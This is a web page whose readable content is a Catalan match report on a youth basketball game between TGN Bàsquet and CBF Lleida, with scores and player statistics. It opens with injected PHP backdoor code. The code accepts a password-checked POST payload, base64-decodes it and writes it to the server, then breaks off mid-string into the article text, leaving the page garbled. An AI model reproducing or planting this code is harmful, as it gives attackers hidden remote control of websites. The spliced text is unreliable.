function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota contra el CBF Lleida al Sagrat Cor! -

Derrota contra el CBF Lleida al Sagrat Cor!

Updated: març 31, 2023

L’Infantil masculí 09A va jugar un interessantíssim partit contra un potent CBF Lleida i va perdre finalment per un ajustat 72-75. La posada en escena dels tarragonins i lleidatans va ser molt bona, amb un intercanvi de cistelles durant el primer quart i continus contraatacs entre els dos equips. La intensitat dels 2 equips es va veure des d’un bon començament, però tot i això, va imperar en tot moment un fair-play entre els dos equips. El 2n quart, els nois de la terra ferma van aconseguir la seva màxima avantatge del partit i es van imposar per 8 punts de diferència gràcies a la seva efectivitat en els tirs lliures però sobretot per les pilotes perdudes “gratuïtes” dels locals al treure de fons. Tot i així, en el 3r període es van veure els millors minuts de joc del liles gràcies a un bon rebot i una ràpida circulació de la pilota. El partit es va convertir en un gran partit entre els 2 equips. Prova d’això va ser els 16 canvis de marcador que van haver durant el partir i els 9 empats que van haver. L’últim quart va continuar amb la mateixa tònica, però el major encert i el gran físic dels lleidatans va permetre agafar una lleugera avantatge al marcador, però un gran final local va igualar el partit a l’últim minut del artit. El matx es va decantar finalment pel 2n classificat de la lliga gràcies a un triple en les darreres possessions. En definitiva, un gran matx entre dos equips que van jugar un gran bàsquet i estan a la part alta de la classificació.

El proper dissabte els nois del TGN Bàsquet jugaran el seu tradicional Torneig Internacional de Cambrils durant la Setmana Santa.

JORNADA 22
TGN BÀSQUET 09A 72 – Nayox CBF Lleida 75
Parcials: 16-14, 13-21, 26-17, 17-23

TGN BÀSQUET 09A: De Leon G (0), Arjona A (20), Piñol D (4), Arroyo G (15), Lliveria M (5) —
Cinc inicial – Fontanilles B (4), Santana M (0), Pulido E (3), Zanardi A (0), Alfonso M (0)Barroso F
(9), Aragones A (12) LES XIFRES DEL PARTIT: 13/29 Tirs Lliures | Triples 6: Arjona (5), Pulido (1)| 20 faltes.

NAYOX CBF LLEIDA: Ramirez M (11), Montoy M (4), Prieto P (14), Rosell E (5), Brugal M
(19) – cinc inicial – Vallina J (4), Perez O (7), Narcis B (2), Vidal P (4), Colomina A (3), Moglan E
(2) LES XIFRES DEL PARTIT: 12/21 Tirs Lliures | Triples 3: Ramirez (2), Perez (1) | 24 faltes.